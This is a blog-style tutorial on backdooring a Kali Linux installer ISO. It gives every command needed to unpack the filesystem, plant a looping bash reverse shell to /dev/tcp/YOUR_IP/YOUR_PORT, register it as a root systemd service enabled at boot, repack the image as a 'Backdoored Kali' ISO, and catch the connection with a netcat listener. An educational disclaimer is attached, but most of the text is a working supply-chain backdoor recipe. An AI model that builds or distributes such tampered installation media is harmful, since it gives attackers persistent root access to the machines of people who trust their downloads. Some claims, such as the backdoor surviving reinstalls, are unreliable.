Backdooring Linux ISO with a Persistent Reverse Shell

Introduction

Linux is one of the most popular distibution, used in everything from personal computers to enterprise servers. Most people download Linux distributions as ISO files, assuming they are safe. But what if the ISO itself is modified before installation? That’s where backdooring a Linux ISO comes into play—embedding a hidden access point that allows attacker to control the system after it’s installed with persistence.

Imagine setting up what you believe to be a secure Linux machine, only to find out later that it has a secret backdoor, giving an attacker remote access. Scary, right? This technique is often used by APTs and red teamers.

In this blog, we’ll break down how this attack works, how it can be reproduced and what parts of a Linux ISO can be modified. While the steps are purely for educational purposes.

Let’s dive in! ??

Disclaimer: This blog is for educational purposes only. The techniques discussed are intended to help security professionals understand potential risks and strengthen defenses. Unauthorized modification and distribution of software without consent is illegal and unethical.

Why backdooring Linux ISO ?

Backdooring a Linux ISO is one of the stealthiest ways to gain persistent access to a system. By injecting a hidden backdoor before installation, an attacker ensures control even before security tools are deployed.

Why It’s Effective?

• Supply Chain Attacks – A compromised ISO can infect multiple machines at once.
• Bypassing Security Controls – Modifications at the OS level can evade antivirus and endpoint security. (Note: In this blog, I haven't covered the AV and EDR evasion techniques.)
• Stealth & Persistence – Unlike traditional malware, a backdoored OS survives reinstalls and updates.
• Custom Payloads – Attackers can add hidden users, reverse shells, or malicious system services.

A well-placed backdoor in an ISO can provide long-term, undetectable access, making it a high-impact technique for both offensive security and real-world cyber threats.

Different Linux Persistent Methods

1. SSH Backdoors
2. Systemd Service Backdoor
3. Crontab Persistence
4. Modifying .bashrc or .profile
5. Kernel Module (Rootkit) Persistence
6. Replacing System Binaries (Eg, ls, cd, ps, etc...)

Persistence Using a Systemd Service Backdoor

Systemd is the default init system in most modern Linux distributions, managing services and processes at startup. By creating a rogue systemd service, an attacker can ensure that their backdoor automatically runs every time the system boots, maintaining persistent access without user interaction.

How It Works ?

A systemd service file is a simple text file stored in /etc/systemd/system/. It defines how a service should start, what it should execute, and whether it should restart on failure. Attackers can abuse this by creating a service that launches a reverse shell, ensuring remote access even after reboots.

Backdooring the Linux ISO file

Prerequisites

• Kali Linux ISO file
• A linux system
• Interest to learn

Environment Set-up

mkdir -p ~/iso_extract ~/squashfs_root ~/mount_dir        

These are directories are used for iso file extraction, segregation and modification.

Mount & Extract the Kali ISO

Mount the Kali Linux ISO to access its contents:

sudo mount -o loop kali-linux-2024.4-installer-amd64.iso ~/mount_dir        

Now, copy the ISO contents for modification:

cp -rT ~/mount_dir ~/iso_extract        

ISO files are read-only file which can't be straightly modified,so here we will mount the ISO file and copy the files to other directory. Unmount the ISO since we don’t need it anymore:

sudo umount ~/mount_dir        

Extract the Compressed Root Filesystem (SquashFS)

The Kali OS files are stored inside a compressed filesystem (filesystem.squashfs), so we need to extract it.

sudo unsquashfs -d ~/squashfs_root ~/iso_extract/live/filesystem.squashfs        

Now, the entire root filesystem is extracted to ~/squashfs_root/.

Create the Reverse Shell Script

This script will connect back to your attack machine automatically.

sudo mkdir -p ~/squashfs_root/etc/persistence
sudo nano ~/squashfs_root/etc/persistence/backdoor.sh        

Paste the following inside backdoor.sh:

#!/bin/bash
while true; do
    bash -i >& /dev/tcp/YOUR_IP/YOUR_PORT 0>&1
    sleep 5  
done        

Save & exit (CTRL + X, Y, Enter).

Make it executable:

sudo chmod +x ~/squashfs_root/etc/persistence/backdoor.sh        

Create a Systemd Service

Create a Systemd service so the reverse shell starts automatically on boot.

sudo nano ~/squashfs_root/etc/systemd/system/backdoor.service        

Paste this inside:

[Unit]
Description=Persistent Reverse Shell
After=network.target

[Service]
Type=simple
ExecStart=/etc/persistence/backdoor.sh
Restart=always
User=root

[Install]
WantedBy=multi-user.target        

Save & exit (CTRL + X, Y, Enter).

Enable the Service Inside the ISO

Since we cannot run systemctl enable inside the extracted ISO, we manually create the necessary symlink.

sudo mkdir -p ~/squashfs_root/etc/systemd/system/multi-user.target.wants        

sudo ln -s /etc/systemd/system/backdoor.service ~/squashfs_root/etc/systemd/system/multi-user.target.wants/backdoor.service        

This ensures that Systemd automatically starts the reverse shell on boot.

Repack the Modified Filesystem (SquashFS)

Now that we’ve modified the system, we need to compress it back into a filesystem.squashfs.

sudo rm ~/iso_extract/live/filesystem.squashfs  
sudo mksquashfs ~/squashfs_root ~/iso_extract/live/filesystem.squashfs -comp xz -b 1048576        

This will generate a new compressed filesystem that includes our backdoor.

Rebuild the Kali ISO

Now, we create a new bootable ISO from the modified files.

cd ~/iso_extract
sudo mkisofs -D -r -V "Backdoored Kali" -cache-inodes -J -l \
  -b isolinux/isolinux.bin -c isolinux/boot.cat -no-emul-boot -boot-load-size 4 -boot-info-table \  -o ~/backdoored-kali.iso .        

The new backdoored ISO is now built: ~/backdoored-kali.iso

Set Up Your Listener on the Attacker Machine

On your attacker system, run:

nc -lvnp YOUR_PORT        

Example:

nc -lvnp 4444        

Now, whenever the backdoored Kali system boots, it will connect back to you!

Proof-of-Concept

Conclusion

Backdooring a Linux ISO is a stealthy and effective way to gain persistent access to a system. By using a systemd service backdoor, the attacker ensures their payload runs automatically on every reboot, making it a reliable method for maintaining control. This technique highlights how deeply an attacker can embed themselves into a system before it's even deployed. Understanding such methods not only expands offensive security skills but also sheds light on the real-world risks of compromised installation media.